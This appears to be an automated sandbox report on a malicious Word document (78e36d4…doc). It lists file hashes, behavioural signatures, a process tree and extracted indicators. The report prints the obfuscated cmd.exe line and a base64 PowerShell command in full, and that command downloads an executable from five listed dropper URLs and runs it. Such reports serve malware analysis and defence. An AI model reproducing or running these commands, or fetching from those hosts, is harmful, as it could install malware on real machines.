Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27/05/2024, 02:05

General

  • Target

    778e36d4666cb974072baed674317ab2_JaffaCakes118.doc

  • Size

    77KB

  • MD5

    778e36d4666cb974072baed674317ab2

  • SHA1

    02a82a2f3e193884c9f2a530ca6b777102939e98

  • SHA256

    b310420513b142dbff7001fb48a391591d97ffc1ed7564805c978fe60a971c51

  • SHA512

    089d9a5988459062a736e14446d536f46385437da2faffe00e651cfdcaae6b1579b1fcac25b1ffa1040adf955e0bc182e353e746cb4e773c80ba8355b32eda1b

  • SSDEEP

    1536:3nptJlmrJpmxlRw99NBq+axRc6MT4I6Dhl93tCX:Zte2dw99fHn8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tresillosmunoz.com/2HB

exe.dropper

http://tonyleme.com.br/8l3XcSKQ

exe.dropper

http://sg2i.com/wwG

exe.dropper

http://lunacine.com/CQ

exe.dropper

http://www.yuanjhua.com/OwUzt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\778e36d4666cb974072baed674317ab2_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2704
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd /V/C"^s^e^t N^Y^GD==A^A^I^AAC^A^gA^A^I^A^AC^Ag^AA^IA^AC^AgAAI^AAC^A^g^AAIAAC^Ag^AAIA^AC^A^9BQf^AsH^AoBwY^A^QH^A^hBw^Y^A^0^H^A^7^A^w^a^AEGA^lBgcA^IG^A7^AQ^d^AIH^A^EB^AJAAC^At^BQ^ZAQHA^J^B^Q^LAUGArB^w^bAY^HAu^B^Q^S^As^D^A^p^AQd^AIH^AEB^A^JAAC^As^Aw^a^AkG^A^H^B^A^J^AgCAlB^Ab^AkGA^G^BAZAEGAvB^A^bA^4^G^A3Bw^b^AQE^A^uA^Q^a^A^0GA^GB^AJAsH^A5^BgcA^Q^HA^7B^QK^A^sG^AW^B^wSAQC^A^gAgb^A^kG^AgA^w^aA^kGAHBAJA^gCA^o^BwY^AE^G^Al^BgcA^8GA^m^Bw^O^AcCAl^BAeAU^G^A^uAwJAsCA1^Bw^QAoH^AkA^wKAcCAcBwJA^sC^A^j^BQaA^w^G^AiB^Qd^A^AH^A^6^Ag^d^A4^GAl^B^AJ^A0^DA^1BgcAQ^E^AkA^wO^AcCA^2^Ag^M^AUD^AnAAIA^0^D^Ag^A^Qd^A^MEA6B^A^JAsD^ApA^wJ^AA^EAnA^A^KA^QHAp^B^AbA^AH^ATB^g^L^AcC^A^0Bg^eAU^FA^3^BwTA^8CAt^Bw^bAMGA^u^A^QYAUHA^o^Bg^a^A4^GA^h^B^QdAkH^AuA^w^dAcHA^3B^wL^A^8C^A6AAc^AQ^H^A0^BAaAAEAR^Bw^Q^A^8C^A^tB^wbA^M^G^AuAQ^Z^A4GA^pB^wY^A^E^G^Au^BQ^d^A^wGAvAw^LAoDAw^BA^d^AQH^Ao^B^A^Q^AcEA^3^B^w^dA8C^At^Bw^bAM^G^A^u^A^QaA^IDAnB^wcA8C^AvAgO^A^A^H^A0^B^AdAg^GA^ABQ^U^A^s^EA^TB^wYAg^FAz^AAbA^gD^AvAgc^AIGA^u^AQbA8G^A^jB^gLAU^GAtBQ^ZA^w^GA5Bgb^A8^G^A^0^BwL^A^8C^A^6^A^AcAQH^A^0BAa^AA^EACB^ASAI^D^Av^A^Qb^A^8^GA^jB^gLAoH^Av^BgbAU^H^A^tBwc^A^8^GA^s^BA^b^A^kGAzBQZA^IH^A0B^w^LA8CA6^AAcA^QHA^0B^A^aAcCA9A^waA^Y^FAL^B^A^J^A^sD^A0B^g^b^AU^G^A^p^B^A^bA^M^E^A^i^B^QZAc^FAu^A^A^dA^U^GA^OBA^IA^QH^Aj^B^Q^ZAoGA^i^Bw^b^A0C^A^3BQ^Z^A^4GA9^AQa^A^0GAGBA^J e- ll^ehsr^e^wop&&^f^or /^L %^O ^in (9^0^5,^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JABGAG0AaQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABLAFYAawA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAZQBzAGkAbABsAG8AcwBtAHUAbgBvAHoALgBjAG8AbQAvADIASABCAEAAaAB0AHQAcAA6AC8ALwB0AG8AbgB5AGwAZQBtAGUALgBjAG8AbQAuAGIAcgAvADgAbAAzAFgAYwBTAEsAUQBAAGgAdAB0AHAAOgAvAC8AcwBnADIAaQAuAGMAbwBtAC8AdwB3AEcAQABoAHQAdABwADoALwAvAGwAdQBuAGEAYwBpAG4AZQAuAGMAbwBtAC8AQwBRAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHkAdQBhAG4AagBoAHUAYQAuAGMAbwBtAC8ATwB3AFUAegB0ACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJAB6AEMAdQAgAD0AIAAnADUAMgA2ACcAOwAkAEQAcgB1AD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAHoAQwB1ACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABHAGkAawAgAGkAbgAgACQASwBWAGsAKQB7AHQAcgB5AHsAJABGAG0AaQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABHAGkAawAsACAAJABEAHIAdQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABEAHIAdQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2484

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      e7a06f758eb7458a997da3e812c0009f

      SHA1

      8501e9ffb362edd192a1c609655e75f536b4dd32

      SHA256

      4f69ee7a37dd9a2c1ef26b29a146aa91514e58c4ad8e4daa9a221d9cbd5891f0

      SHA512

      bc519952e7095237f736cbf7e6fbd616bb214914e33c8eb4c0359a49b2d407579858f2ae6f0f22ea146ca0695373a4f34d03673c36752f8049618d375f4bcc92

    • C:\Users\Admin\AppData\Local\Temp\Cab3EF6.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar4006.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      fc2d4518849366a01b6e4c863f5890b5

      SHA1

      d09516d4f4dc5f8cef32bd995dd3891132ec0d2a

      SHA256

      91e119c89b27381560215d2603e0f5b290a9c9f8fae50f8dd7a4533747ce41dd

      SHA512

      5feb4a21575379ce846918c49f9756bc7fcc642c7e1174b3faaa0ca73d6abbd163ddef233d421311d6d8080d4f314e2b1647eba4841f203b38b8aa6db8a13895

    • memory/1808-24-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-33-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-17-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-16-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/1808-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-11-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-20-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-0-0x000000002F921000-0x000000002F922000-memory.dmp

      Filesize

      4KB

    • memory/1808-29-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-27-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-2-0x000000007103D000-0x0000000071048000-memory.dmp

      Filesize

      44KB

    • memory/1808-111-0x000000007103D000-0x0000000071048000-memory.dmp

      Filesize

      44KB

    • memory/1808-112-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1808-113-0x0000000006210000-0x0000000006310000-memory.dmp

      Filesize

      1024KB

    • memory/1808-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1808-128-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1808-129-0x000000007103D000-0x0000000071048000-memory.dmp

      Filesize

      44KB